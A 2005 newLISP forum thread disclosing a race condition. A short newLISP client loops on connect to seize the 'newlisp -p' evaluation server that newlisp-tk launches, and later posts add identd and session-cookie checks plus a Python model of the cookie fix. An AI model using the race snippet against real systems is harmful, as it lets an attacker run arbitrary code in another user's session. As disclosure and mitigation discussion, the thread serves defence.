newlisp -p security problem

Started by Dmi, August 22, 2005, 12:18:03 AM

Dmi

Try to run the following code:
(set 'host "127.0.0.1" 'port 64001)
(do-until socket
  (set 'socket (net-connect host port)))
(if (and socket (net-receive socket 'str 512))
  (begin
    (print "connected> " str)
    (do-while (net-send socket (append (read-line) "\n"))
      (sleep 1)
      (while (!= (net-peek socket) 0)
        (begin
          (net-receive socket 'str 512)
          (print "got: " str)))
      (print "eval: "))))
(exit)

and, while it is running, try to start newlisp-tk on the same host.

If the program above exits silently, try again several times.

If the program gives an "eval:" prompt, then you have gained the "newlisp -p" instance started by newlisp-tk:

Try to write lisp expressions...

And check the newlisp-tk window - it sucks now.



I can gain a shell in about 1 of 3-5 tries...



Problem analysis:

When newlisp-tk starts, it runs newlisp -p 64001, then tries to connect to it.

There is some time between newlisp starting to listen and newlisp-tk sending a connect to it.

A fast enough malicious program can (statistically) win the race with newlisp-tk.



I think this isn't good... And... it is remotely exploitable too!

I think this functionality must have strict user authorization (but not by plain passwords ;-). Possibly, using a randomly generated cookie known by newlisp and its client (like the X11 magic cookie) will be sufficient.



But... I think domain sockets will be more useful ;-)
WBR, Dmi

statik

#1
Good call. I'm not so hot on the cookie idea though... That's just me.
-statik

Dmi

#2
As usual, Lutz gives a good trick :-)



When newlisp -p is started, it begins to interpret the code only after an incoming connection is received. So

(net-peer (first (net-sessions)))

will always return the interactive client's ip/port, which we can then check.



This is the code for local identd-based checking:
(load "ident.lsp")
(IDENT:auth-local)

ident client context is available here: http://en.feautec.pp.ru/SiteNews/ContextIDENT

... and you need a running identd of course.



And this is possible code for session cookie auth:
(print "enter session cookie: ")
(if (!= (read-line) "session cookie")  ;-)
  (begin
    (println "session cookie not entered!")
    (exit)))


To use similar code you need to save it in a file (say, "netinit.lsp") and then start

$ newlisp -p 12345 netinit.lsp
WBR, Dmi
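The magic-cookie scheme discussed above, modelled in Python as an added example (not code from this thread and not newLISP): the user who starts the listener writes a random cookie to a file only they can read, and every accepted connection must present that cookie on its first line before any expression is evaluated. The cookie path, the function names and the 127.0.0.1 peer check are assumptions; the accept loop around `authenticate` is left to the caller.

```python
import hmac
import os
import secrets
import socket

# Assumed location of the shared secret, in the spirit of ~/.Xauthority
COOKIE_PATH = os.path.expanduser("~/.newlisp-cookie")


def make_cookie_file(path=COOKIE_PATH):
    """Generate a fresh random cookie and store it with mode 0600, so only
    processes running as this user (e.g. newlisp-tk) can read it."""
    cookie = secrets.token_hex(16)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(cookie + "\n")
    return cookie


def read_cookie_file(path=COOKIE_PATH):
    with open(path) as f:
        return f.readline().rstrip("\n")


def cookie_matches(presented, expected):
    # compare_digest rather than !=: a plain string compare leaks timing
    return hmac.compare_digest(presented.encode(), expected.encode())


def recv_line(conn, limit=256):
    """Read one newline-terminated line, bounded so an unauthenticated
    client cannot feed an endless first line."""
    buf = b""
    while len(buf) < limit:
        ch = conn.recv(1)
        if not ch or ch == b"\n":
            break
        buf += ch
    return buf.decode("utf-8", "replace")


def authenticate(conn, expected, peer):
    """Gate one accepted connection. peer is the (host, port) pair that
    (net-peer ...) reports: refuse anything not from loopback, then require
    the cookie as the first line. Returns True only if the session may go on."""
    if peer[0] != "127.0.0.1":
        conn.close()
        return False
    if not cookie_matches(recv_line(conn), expected):
        conn.sendall(b"session cookie not entered!\n")
        conn.close()
        return False
    conn.sendall(b"connected> \n")
    return True
```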

newdep

#3
Hello Dmi,



That ident.lsp is a nice one, great job...



Regards, Norman.
-- (define? (Cornflakes))